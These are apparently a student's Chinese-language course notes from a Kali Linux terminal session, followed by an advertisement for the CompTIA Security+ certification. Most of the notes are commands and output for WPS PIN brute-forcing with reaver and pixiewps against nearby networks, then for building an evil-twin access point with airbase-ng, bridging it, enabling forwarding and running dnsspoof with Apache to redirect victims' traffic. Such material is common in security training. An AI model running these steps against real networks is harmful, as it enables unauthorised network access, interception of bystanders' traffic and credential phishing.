WPS及其他工具
[email protected]:~# service network-manager stop
[email protected]:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
先打上面的兩個指令,把網卡映射到虛拟機,記住這個順序
[email protected]:~# ifconfig //看不到網卡
[email protected]:~# ifconfig -a //必須運作ifconfig -a 才可以看到網卡
[email protected]:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1672 avahi-daemon
1673 avahi-daemon
PHY Interface Dirver Chipset
phy0 wlan2 ath9k_htc Atheros Communications, Inc . AR9271 802.11
(mac80211 monitor mode vif enbale for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disbale for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions.
wlan2mon IEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
[email protected]:~# wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
[email protected]:~# wash -i wlan2mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A 1 00 1.0 No ziroom222
0C:82:68:5E:76:20 1 00 1.0 No letv
14:75:90:21:4F:56 6 00 1.0 No TP-LINK_4F56
5C:63:BF:F9:74:0C 6 00 1.0 No TP-DO3234
[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1
[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv //開始11000pin碼嘗試
[email protected]:~# pixiewps
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Not all required arguments have been supplied!
[email protected]:~# ixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacn from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
╋━━━━━━━━━━━━╋
┃EVIL TWIN AP / ROGUE AP ┃
┃ 其他工具 ┃
╋━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃蹭網與被蹭網 ┃
┃北上廣20%的公共場所無線網絡是僞造的 ┃
╋━━━━━━━━━━━━━━━━━━╋
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon ┃
┃apt-get install bridge-Utils ┃安裝網橋
┃brctl addbr bridge ┃
┃brctl addif Wifi-Bridge eth0 ┃
┃brctl addif Wifi-Bridge at0 ┃
┃ifconfig eth0 0.0.0.0 up ┃
┃ifconfig at0 0.0.0.0 up ┃
┃ifconfig bridge 192.168.1.10 up ┃
┃route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1 ┃
╋━━━━━━━━━━━━━━━━━━━━━━━━━━━╋
[email protected]:~# airodump-ng wlan2mon
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
80:89:17:15:86:28 -90 9 0 0 11 54e. WPA2 CCMP PSK TP-D03235
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:21:4F:56 E8:3E:B6:1B:19:32 -64 0 -l1e 0 1
14:75:90:21:4F:56 90:3C:92:BA:00:CC -77 0G-11 0 7
14:75:90:21:4F:56 18:DC:56:F0:26:9F -84 0 -1 0 1
[email protected]:~# airbase-ng -c 11 --essid kifi-free wlan2mon //僞造wifi-free無線網絡
21:12:36 Created tap interface at0
12:12:36 Trying to set MTU on at0 to 1500
12:12:36 Trying to set MTU on wlan2mon to 1800
21:12:37 Acess Point with BSSID 08:57:00:0C:96 started
[email protected]:~# ifconfig -a //出現了at0僞造網卡
[email protected]:~# airodump-ng wlan2mon //再偵聽一下,出現了wifi-free無線網絡
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e OPN
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 64:09:80:24:A2:C9 -93 0 - 1 0 3 leon
[email protected]:~# apt-get install bridge-Utils //安裝網橋
[email protected]:~# brctl
Usage: brctl [commands]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
hairpin <bridge> <port> {on|off} turn hairpin on/off
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show [ <bridge> ] show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> {on|off} turn stp on/off
[email protected]:~# brctl addbr bridge
[email protected]:~# brctl addif bridge eth0
[email protected]:~# dhclient eth0
Job for smbd.service failed. See 'systemctl status smbd.service' and 'journalctl -xn' for details.
invoke-rc.d: initscript smbd, action "reload" failed.
[email protected]:~# brctl addif bridge eth0
[email protected]:~# brctl adddif bidge at0
[email protected]:~# ifconfig eth0 0.0.0.0 up
[email protected]:~# ifconfig at0 0.0.0.0 up
[email protected]:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
[email protected]:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
[email protected]:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
╋━━━━━━━━━━━━━━━━━━━╋
┃WPS (WIRELESS PROTECTED SETUP) ┃
┃echo 1 > /proc/sys/net/ipv4/ip_forward┃
┃dnspoof -i bridge -f dnsspoof.hosts ┃
┃ /usr/share/dnsiff/dnsspoof.hosts ┃
┃apachet2ctl start ┃
╋━━━━━━━━━━━━━━━━━━━╋
[email protected]:~# vi /proc/sys/net/ipv4/ip_forward
不讓修改資料!
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
把0改成1,就開啟了路由功能!
[email protected]:~# cat /proc/sys/net/ipv4/ip_forward
1
[email protected]:~# dnspoof -i bridge -f dnsspoof.hosts
[email protected]:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
[email protected]:~# cat /usr/share/dnsiff/dnsspoof.hosts
[email protected]:~# vi host
[email protected]:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]
[email protected]:~# apache
apache2 apache2ctl apachectl apache-users
[email protected]:~# apachet2ctl start
AH00558: apache2: Coule not reliably determine the Server's fully qualified domain name, using 127.0.1.l.Set the 'ServerName' directive globally to suppress this message
[email protected]:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2
該筆記為安全牛課堂學員筆記,想看此課程或者資訊安全類幹貨可以移步到安全牛課堂
Security+認證為什麼是網際網路+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在内的國際 IT 業 10 大熱門認證之一,和CISSP偏重資訊安全管理相比,Security+ 認證更偏重資訊安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程式、資料和主機安全,通路控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有資訊安全認證當中,偏重資訊安全技術的認證是空白的, Security+認證正好可以彌補資訊安全技術領域的空白 。
目前行業内受認可的資訊安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重資訊安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的資訊安全工作經驗都要5年以上,CISP也要求大專學曆4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投标時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由于Security+偏重資訊安全技術,是以對工作經驗沒有特别的要求。隻要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、資訊通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程式猿們“生當做光棍,死亦寫代碼”的悲壯,但也有着“鋤禾日當午,不如運維苦“的感慨。天天對着電腦和機器,時間長了難免有對于職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝着網絡安全的方向發展,解決國内資訊安全人才的匮乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試友善、費用适中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在資訊安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。适合銀行、證券、保險、網際網路公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的資訊安全大潮之下,人才是資訊安全發展的關鍵。而目前國内的資訊安全人才是非常匮乏的,相信Security+認證一定會成為最火爆的資訊安全認證。